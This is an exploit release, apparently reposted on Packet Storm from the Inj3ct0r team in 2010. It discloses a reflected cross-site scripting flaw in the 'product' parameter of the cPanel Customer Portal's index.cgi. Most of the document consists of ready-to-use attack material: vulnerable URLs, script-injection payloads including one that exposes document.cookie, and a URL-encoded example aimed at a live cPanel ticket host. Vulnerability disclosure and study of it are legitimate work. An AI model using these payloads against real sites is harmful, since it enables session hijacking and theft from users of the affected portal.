cPanel Customer Portal suffers from a cross site scripting vulnerability.
a21b61d647c5ac039c00c3fc7e05e2c1====================================================
cPanel Customer Portal (index.cgi) Xss Vulnerability
====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# [+] Discovered By: Inj3ct0r Team
# [+] 1-9-2010
# [+] Version: 2007-2008
# [+] Download:http://www.cpanel.net/
---------------------------------------------------------------
-=[ exploit ]=-
http://localhost.cpanel.net/submit/index.cgi?step=&reqtype=sales&product= [ XSS ]
http://127.0.0.1.cpanel.net/submit/index.cgi?step=&reqtype=sales&product= [ XSS ]
"><script>alert("Inj3ct0r")</script>
"><script>alert(document.cookie)</script>
----------------------------------------------------------------------
-=[ Example ]=-
https://tickets.cpanel.net/submit/index.cgi?step=&reqtype=sales&product=%22%3E%3Cscript%3Ealert(%22inj3ct0r%22)%3C/script%3E
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
================== Greetz ==================================================
SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited ; Sn!pEr.S!Te
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!